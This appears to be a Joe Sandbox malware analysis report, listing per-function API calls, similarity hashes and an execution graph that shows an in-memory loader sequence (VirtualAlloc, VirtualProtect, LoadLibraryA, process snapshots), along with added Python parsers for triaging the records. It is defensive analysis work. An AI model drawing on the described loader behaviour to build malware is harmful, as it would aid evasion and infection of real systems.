                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3212BA2AC4101A6DB30CB54C907B977366EF5CB11F569526E98AC7300F73ADD11C39E
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,024CB32B,?,00000050,?,?,?,?,?), ref: 024CB1AB
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: ACP$OCP
                                                                                                                                                                                                                                                                          • API String ID: 0-711371036
                                                                                                                                                                                                                                                                          • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                                                          • Instruction ID: 881f8b524cf696cebf662c0ab2fbeb5e74a2be9ad5acf937dfd872c3db22ddc7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B21A96AA40105A6DBA68F5D8D037A7735AEF40BECF66812EE909D7304EF32D941C390
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F25
                                                                                                                                                                                                                                                                          • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F4A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: EncodersGdipImage$Size
                                                                                                                                                                                                                                                                          • String ID: image/png
                                                                                                                                                                                                                                                                          • API String ID: 864223233-2966254431
                                                                                                                                                                                                                                                                          • Opcode ID: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
                                                                                                                                                                                                                                                                          • Instruction ID: a861e299a60b9ced5094bb1731eec5177a5b987cbaa8a1425c649574426e8627
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04119476D00109FFCB01AFA99C8149EBB76FE41321B60027BE810B21E0C7755F419A58
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(0000000D,?,0040DE41,0040C659,?,?,00000000,?,0040C529,0045D5E4,0040C4F6,0045D5DC,?,ios_base::failbit set,0040C659), ref: 0040EFAA
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                                                                                                                                          • String ID: F(@
                                                                                                                                                                                                                                                                          • API String ID: 1452528299-2698495834
                                                                                                                                                                                                                                                                          • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                                                                                                                                                                                                          • Instruction ID: 02fe8a739a07683bc60ca74788e4bb9a0325118a5e4d2b20450d6bc28493fa7e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B11C236300216BFCF165F66DD4496AB765BB08B11B11483AFA05A6290CA7498219BD9
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 0040C554
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ___std_exception_destroy
                                                                                                                                                                                                                                                                          • String ID: F(@$ios_base::failbit set
                                                                                                                                                                                                                                                                          • API String ID: 4194217158-1828034088
                                                                                                                                                                                                                                                                          • Opcode ID: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
                                                                                                                                                                                                                                                                          • Instruction ID: 4ba2cac2fce41df0eb0aef52a6a00c17a8a4a8275336f9ee0f9be7dda5d805c6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27F0B472A0022836D2302B56BC02B97F7CC8F50B69F14443FFE05A6681EBF8A94581EC
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: H_prolog3_catch
                                                                                                                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                                                                                                                          • API String ID: 3886170330-2084237596
                                                                                                                                                                                                                                                                          • Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                                                                                                                                                                                          • Instruction ID: e9e4e095770ca636dcca3efe7f5224ff47edcbfbbe98bab9d98b6a8866433d4c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81F0AF70600224CFDB22AF95D40159D3B60AF82748F8281A7F9009B262C73C6E14CFAE
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E3C
                                                                                                                                                                                                                                                                            • Part of subcall function 0040BF5D: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF71
                                                                                                                                                                                                                                                                            • Part of subcall function 0040BF5D: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFAE
                                                                                                                                                                                                                                                                          • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E50
                                                                                                                                                                                                                                                                            • Part of subcall function 0040C008: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C02F
                                                                                                                                                                                                                                                                            • Part of subcall function 0040C008: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C0A0
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                                                                                                                                                                                          • String ID: F@
                                                                                                                                                                                                                                                                          • API String ID: 2118720939-885931407
                                                                                                                                                                                                                                                                          • Opcode ID: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
                                                                                                                                                                                                                                                                          • Instruction ID: 13870e84e441ff14f0459789a428ac9660f365acd1e629d5c6e8dadf1a096d8e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7CF034B2410205DAEB21AF50C412B9973B4BF80B15F61813FE545AB2C1DB786949CB89
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428D83
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00428DAA
                                                                                                                                                                                                                                                                            • Part of subcall function 0042860D: RaiseException.KERNEL32(?,?,0040D87E,00000000,00000000,00000000,00000000,?,?,?,?,0040D87E,00000000,0045617C,00000000), ref: 0042866D
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • Access violation - no RTTI data!, xrefs: 00428D7A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
                                                                                                                                                                                                                                                                          • String ID: Access violation - no RTTI data!
                                                                                                                                                                                                                                                                          • API String ID: 2053020834-2158758863
                                                                                                                                                                                                                                                                          • Opcode ID: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
                                                                                                                                                                                                                                                                          • Instruction ID: 6523df8e39b2e501409064d37ec9e65ca05e1b8799177bf407a1bfc54a05c872
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28E0DF726993185A9A04D6A1B846CDE73EC9E24300BA0001FF900920C2EE2DF918826D
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042382E
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ContextInternal$BaseBase::~Concurrency::details::
                                                                                                                                                                                                                                                                          • String ID: zB$~B
                                                                                                                                                                                                                                                                          • API String ID: 3275300208-395995950
                                                                                                                                                                                                                                                                          • Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                                                                                                                                                                                                                                          • Instruction ID: f55228a66ce0378ecda15d2e29e2cf9b619ecd1f8f2314d3bfe00ef4b4db5243
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83D05B7124C32525E2256A4974057857AD84B01764F50803FF94456682CBB9654442DC
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212DB
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 004212E9
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                          • String ID: pThreadProxy
                                                                                                                                                                                                                                                                          • API String ID: 1687795959-3651400591
                                                                                                                                                                                                                                                                          • Opcode ID: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
                                                                                                                                                                                                                                                                          • Instruction ID: be918fe35ab2875efcd6209978594ad56e839e7639c00e6f4a717d1a784130ad
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DED05B71E0020856D700E7B6D806F9F77A85B10708F50427B7D14E6186DB79E50886AC
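The per-function records above follow one fixed plain-text layout (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity), and most of the functions listed so far resolve to statically linked MSVC runtime code (LIBVCRUNTIME, LIBCPMT, LIBCONCRT) rather than to anything specific to this sample. The following Python script is an added example and is not part of the Joe Sandbox report or its tooling: it parses records in this layout into structured data, separates direct API references from "Part of subcall function" references, and flags functions whose direct references are all runtime-library code, which are poor material for sample-specific signatures. The sample input is constructed from two records of this report (abridged, with the table indentation removed); the set of runtime-library tags and the assumption that each record opens with its "APIs" header are this example's own, not a documented Joe Sandbox interface.

```python
"""Parse Joe Sandbox per-function Similarity records and triage them. Added example,
not Joe Sandbox code. Assumes the plain-text layout in the report: bullet entries under
the headers APIs / Strings / Memory Dump Source / Joe Sandbox IDA Plugin / Similarity."""
import re
from dataclasses import dataclass, field
from typing import Optional

RUNTIME_LIBS = {"LIBVCRUNTIME", "LIBCPMT", "LIBCONCRT", "LIBCMT"}  # MSVC runtime tags (assumed)
HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# '• Name.MODULE(args), ref: ADDR', optionally prefixed 'Part of subcall function ADDR: '.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<name>\S+?)\.(?P<mod>[A-Z0-9_]+)(?P<args>\(.*\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})$")
XREF_RE = re.compile(r"^•\s*(?P<text>.*), xrefs: (?P<addr>[0-9A-Fa-f]{8})$")
KV_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+):\s?(?P<val>.*)$")

@dataclass
class ApiRef:
    name: str
    module: str
    ref: int                   # call-site address
    subcall_of: Optional[int]  # callee address when the call sits in a subroutine

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)  # (text, xref address)
    fields: dict = field(default_factory=dict)   # 'API ID', 'Opcode ID', ...

def parse_records(text: str) -> list:
    records, section, cur = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in HEADERS:
            if line == "APIs":  # every record opens with its APIs header
                cur = FunctionRecord()
                records.append(cur)
            section = line
            continue
        if cur is None:
            continue
        if section == "APIs" and (m := API_RE.match(line)):
            sub = int(m["sub"], 16) if m["sub"] else None
            cur.apis.append(ApiRef(m["name"], m["mod"], int(m["ref"], 16), sub))
        elif section == "Strings" and (m := XREF_RE.match(line)):
            cur.strings.append((m["text"], int(m["addr"], 16)))
        elif m := KV_RE.match(line):
            cur.fields[m["key"].strip()] = m["val"]
    return records

def is_runtime_only(rec: FunctionRecord) -> bool:
    """True when every direct API reference resolves to MSVC runtime library code."""
    direct = [a for a in rec.apis if a.subcall_of is None]
    return bool(direct) and all(a.module in RUNTIME_LIBS for a in direct)

def summarize(text: str) -> list:
    """One triage row per record: what it calls, from where, and whether it is library code."""
    rows = []
    for rec in parse_records(text):
        rows.append({
            "api_id": rec.fields.get("API ID", ""),
            "api_string_id": rec.fields.get("API String ID", ""),
            "modules": sorted({a.module for a in rec.apis}),
            "call_sites": [a.ref for a in rec.apis if a.subcall_of is None],
            "runtime_only": is_runtime_only(rec),
            # the report prints Opcode ID and Opcode Fuzzy Hash as the same value
            "ids_consistent": "Opcode ID" in rec.fields
                              and rec.fields["Opcode ID"] == rec.fields.get("Opcode Fuzzy Hash"),
        })
    return rows

# Constructed sample: two abridged records of this report with the table indentation removed.
SAMPLE = """\
APIs
• std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428D83
• __CxxThrowException@8.LIBVCRUNTIME ref: 00428DAA
  • Part of subcall function 0042860D: RaiseException.KERNEL32(?,?,0040D87E,00000000,00000000,00000000,00000000,?,?,?,?,0040D87E,00000000,0045617C,00000000), ref: 0042866D
Strings
• Access violation - no RTTI data!, xrefs: 00428D7A
Memory Dump Source
• Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
• String ID: Access violation - no RTTI data!
• API String ID: 2053020834-2158758863
• Opcode ID: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
• Opcode Fuzzy Hash: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,F(@,00000000), ref: 0042AF20
• GetLastError.KERNEL32 ref: 0042AF2E
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF89
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0
"""
```

Run `summarize(SAMPLE)` to get one row per function. The first record comes out as runtime-only (its direct references are both LIBVCRUNTIME; the RaiseException call is reached through a subcall and is not counted), while the MultiByteToWideChar record calls KERNEL32 directly and is kept for review. The call-site addresses are the "ref:" values, so `min(call_sites)` gives an upper bound on where the function starts in the 0x400000 memory dump.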
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,F(@,00000000), ref: 0042AF20
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0042AF2E
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF89
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                          • Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                                                                                                                                                                                                          • Instruction ID: 9270b5025f3a17d6db836abfdfc26bc83889a51b194ae21b206bd0a56260f073
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F410770700222AFCB219F65EA44BABBBB4EF01311F56416BFC5597291DB3C8D11C75A
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,02492AAD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,02492AAD,00000000), ref: 024BB187
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 024BB195
                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,02492AAD,00000000), ref: 024BB1F0
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                          • Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                                                                                                                                                                                                                          • Instruction ID: 7c2054144e0ca0be18c61295da41c3879ff775182cb29d36a43112ccc1edfe54
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B441E831A00216AFDF279F65CC487EF7BA5EF41759F14416AEC599B2A0DB308901CB70

                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                          Execution Coverage:1.6%
                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:44.4%
                                                                                                                                                                                                                                                                          Signature Coverage:12.7%
                                                                                                                                                                                                                                                                          Total number of Nodes:63
                                                                                                                                                                                                                                                                          Total number of Limit Nodes:5
execution_graph (one entry per connected subgraph; "addr API" is a node that calls that API, "->" is an edge, all reconstructed from the node/edge dump):
• Entry 43b068 (nodes 26309-26316): 43b068 -> 43b080 -> 43b16e -> 43b23f; 43b080 and 43b16e each call 43a9b0 LdrInitializeThunk, which returns to 43b16e and 43b23f respectively.
• Entry 40b44c (nodes 26317-26324): 40b44c -> 40b45a -> 40b65c, with early exits 40b44c -> 40b57c and 40b45a -> 40b57c; 40b45a and 40b65c each call 43a950 RtlFreeHeap, returning to 40b65c and 40b57c respectively.
• Entry 43aecc (nodes 26325-26329): 43aecc -> 43af00 -> 43af7e; 43af00 also calls 43a9b0 LdrInitializeThunk, returning to 43af7e.
• Entry 408790 (nodes 26330-26336): 408790 -> 40879f -> 4087b4 GetCurrentProcessId GetCurrentThreadId -> 4087da -> 4087de SHGetSpecialFolderPathW GetForegroundWindow -> 40887a -> 408970 ExitProcess; shortcuts 40879f -> 408970, 40879f -> 40887a and 4087b4 -> 4087de.
• Entry ae003c (nodes 26337-26357, addresses outside the 00400000 image): ae003c -> ae0049 -> ae0e0f SetErrorMode SetErrorMode -> ae0223 -> ae0d90 -> ae0dad -> ae0dbb GetPEB -> ae0238 VirtualAlloc -> ae0265 -> ae02ce VirtualProtect -> ae030b -> ae0439 VirtualFree; from ae0439 either the loop ae04be <-> ae04e3 LoadLibraryA or ae05f4 LoadLibraryA -> ae08c7; also ae0dad -> ae0238 and ae04be -> ae05f4.
• Node 26358: 438e51 RtlAllocateHeap, no edges.
• Entry 43ab91 (nodes 26359-26361): 43ab91 -> 43ab9a GetForegroundWindow -> 43abad.
• Entry 438e70 (nodes 26362-26365): 438e70 -> 438e83 -> 438e88 RtlFreeHeap -> 438e94; also 438e70 -> 438e94.
• Entry 43b3fb (nodes 26371-26375): 43b3fb -> 43b2b5 (self-loop) -> 43b3be; 43b2b5 also calls 43a9b0 LdrInitializeThunk, returning to 43b3be.
• Entry bd92e6 (nodes 26376-26390): bd92e6 -> bd92f5 -> bd9a86 -> bd9aa1 -> bd9aaa CreateToolhelp32Snapshot (loops back to bd9aa1) -> bd9ac6 Module32First -> bd9ad5 -> bd9745 -> bd9770 -> bd9781 VirtualAlloc -> bd97b9 (self-loop); also bd9aa1 -> bd9ac6, bd9ac6 -> bd92fe and bd9770 -> bd97b9.
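The execution graph above is exported as a single whitespace-separated token stream, which is hard to read by eye when a report has hundreds of nodes. The following parser is an added example, not part of the report or of Joe Sandbox: it recovers nodes, edges and per-entry-point API chains from that dump, so the VirtualAlloc/VirtualProtect/LoadLibraryA sequence at ae003c or the CreateToolhelp32Snapshot/Module32First/VirtualAlloc sequence at bd92e6 can be picked out automatically. The token format (decimal node id, one address, zero or more API names, and "a->b" edge tokens) is assumed from the dump as printed here; the embedded input is three subgraphs copied from it.

```python
"""Parser for the flattened Joe Sandbox execution_graph dump (example code, not part
of the report or of Joe Sandbox). Format assumed from the dump above: an optional
'execution_graph' label, then for each node a decimal id, one address and zero or
more API names; tokens of the form 'a->b' are edges between node ids."""
import re
from collections import defaultdict, deque

# Constructed input: three subgraphs copied from the execution graph dump above
# (the 408790, ae003c and bd92e6 entries); not the complete dump.
SAMPLE_GRAPH = (
    "execution_graph "
    "26330 408790 26332 40879f 26330->26332 26331 408970 ExitProcess 26332->26331 "
    "26333 4087b4 GetCurrentProcessId GetCurrentThreadId 26332->26333 26336 40887a "
    "26332->26336 26334 4087da 26333->26334 26335 4087de SHGetSpecialFolderPathW "
    "GetForegroundWindow 26333->26335 26334->26335 26335->26336 26336->26331 "
    "26337 ae003c 26338 ae0049 26337->26338 26352 ae0e0f SetErrorMode SetErrorMode "
    "26338->26352 26343 ae0265 26344 ae02ce VirtualProtect 26343->26344 26346 ae030b "
    "26344->26346 26345 ae0439 VirtualFree 26350 ae05f4 LoadLibraryA 26345->26350 "
    "26351 ae04be 26345->26351 26346->26345 26347 ae04e3 LoadLibraryA 26347->26351 "
    "26349 ae08c7 26350->26349 26351->26347 26351->26350 26353 ae0223 26352->26353 "
    "26354 ae0d90 26353->26354 26355 ae0dad 26354->26355 26356 ae0dbb GetPEB "
    "26355->26356 26357 ae0238 VirtualAlloc 26355->26357 26356->26357 26357->26343 "
    "26376 bd92e6 26377 bd92f5 26376->26377 26380 bd9a86 26377->26380 26381 bd9aa1 "
    "26380->26381 26382 bd9aaa CreateToolhelp32Snapshot 26381->26382 26383 bd9ac6 "
    "Module32First 26381->26383 26382->26381 26382->26383 26384 bd9ad5 26383->26384 "
    "26386 bd92fe 26383->26386 26387 bd9745 26384->26387 26388 bd9770 26387->26388 "
    "26389 bd97b9 26388->26389 26390 bd9781 VirtualAlloc 26388->26390 26389->26389 "
    "26390->26389"
)

NODE_ID = re.compile(r"^\d+$")
EDGE = re.compile(r"^(\d+)->(\d+)$")


def parse_graph(text):
    """Return ({id: (address, [api names])}, [(src_id, dst_id)]).

    Node ids are decimal, so the token right after an id is always taken as the
    address even when it happens to be all digits (e.g. 408790); anything else that
    is not an id or an edge is an API name attached to the current node.
    """
    nodes, edges = {}, []
    cur, expect_addr = None, False
    for tok in text.split():
        if tok == "execution_graph":
            continue
        m = EDGE.match(tok)
        if m:
            if expect_addr:
                raise ValueError(f"edge {tok!r} where an address was expected")
            edges.append((int(m.group(1)), int(m.group(2))))
            continue
        if expect_addr:
            nodes[cur] = (tok, [])
            expect_addr = False
        elif NODE_ID.match(tok):
            cur, expect_addr = int(tok), True
        elif cur is None:
            raise ValueError(f"API name {tok!r} before any node")
        else:
            nodes[cur][1].append(tok)
    for s, d in edges:
        if s not in nodes or d not in nodes:
            raise ValueError(f"edge {s}->{d} references an undefined node")
    return nodes, edges


def roots(nodes, edges):
    """Entry points: nodes with no incoming edge from another node (self-loops ignored)."""
    has_in = {d for s, d in edges if s != d}
    return [n for n in nodes if n not in has_in]


def api_chain(nodes, edges, root):
    """Breadth-first walk from root; returns [(address, api)] for every API node reached."""
    succ = defaultdict(list)
    for s, d in edges:
        succ[s].append(d)
    seen, queue, out = {root}, deque([root]), []
    while queue:
        n = queue.popleft()
        addr, apis = nodes[n]
        out.extend((addr, a) for a in apis)
        for d in succ[n]:
            if d not in seen:
                seen.add(d)
                queue.append(d)
    return out


def summarize(text):
    """Map each entry-point address to the sorted set of APIs reachable from it."""
    nodes, edges = parse_graph(text)
    return {nodes[r][0]: sorted({a for _, a in api_chain(nodes, edges, r)})
            for r in roots(nodes, edges)}


def roots_calling(text, required):
    """Entry points whose reachable APIs include every name in `required`, e.g. the
    VirtualAlloc/VirtualProtect/LoadLibraryA combination of an in-memory PE loader."""
    return sorted(addr for addr, apis in summarize(text).items()
                  if set(required) <= set(apis))


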